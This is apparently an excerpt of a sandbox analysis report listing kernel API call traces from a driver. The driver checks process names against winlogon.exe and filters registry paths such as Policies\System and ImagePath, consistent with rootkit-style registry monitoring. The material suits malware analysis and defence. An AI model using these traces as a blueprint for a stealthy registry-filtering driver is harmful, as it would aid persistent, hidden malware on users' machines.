| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x130, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x130, ObjectNameInfo_unk_out = 0xffffe0003a785c30, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Maintenance Install | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba381610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba381610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x126, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba381610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba381610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x124, ret_val_ptr_out = 0xffffe0003a785af0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba381610, Length = 0x124, ObjectNameInfo_unk_out = 0xffffe0003a785af0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785af0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x126, ret_val_ptr_out = 0xffffe0003a785c30 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x124, ret_val_ptr_out = 0xffffe0003a785af0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x124, ObjectNameInfo_unk_out = 0xffffe0003a785af0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785af0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785c30, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Execution Path #158 (length: 215, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 215 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd2, ret_val_ptr_out = 0xffffe0003a76faa0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd0, ret_val_ptr_out = 0xffffe0003a782f30 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0xd0, ObjectNameInfo_unk_out = 0xffffe0003a782f30, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd2, ret_val_ptr_out = 0xffffe0003a76faa0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd0, ret_val_ptr_out = 0xffffe0003a782f30 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0xd0, ObjectNameInfo_unk_out = 0xffffe0003a782f30, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000293450d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd2, ret_val_ptr_out = 0xffffe0003a76faa0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8df4a80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344db8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd0, ret_val_ptr_out = 0xffffe0003a782f30 |
| ObQueryNameString | Object_ptr = 0xffffc000b8df4a80, Length = 0xd0, ObjectNameInfo_unk_out = 0xffffe0003a782f30, ReturnLength_ptr_out = 0xffffd00029344db8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x2a, ret_val_ptr_out = 0xffffe0003af83eb0 |
| _wcsicmp | _String1 = officeclicktorun.exe, _String2 = ImagePath, ret_val_out = 6 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83eb0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7bd5a40, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7bd5a40, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 |
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8544700, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8544700, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf4, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8544700, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8544700, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b8544700, Length = 0xf2, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8544700, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8544700, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000293450d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf4, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8544700, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8544700, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344db8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b8544700, Length = 0xf2, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344db8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x1c, ret_val_ptr_out = 0xffffe0003c634190 |
| _wcsicmp | _String1 = RulesEndpoint, _String2 = ImagePath, ret_val_out = 9 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7bd5a40, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7bd5a40, ret_val_out = 1 |
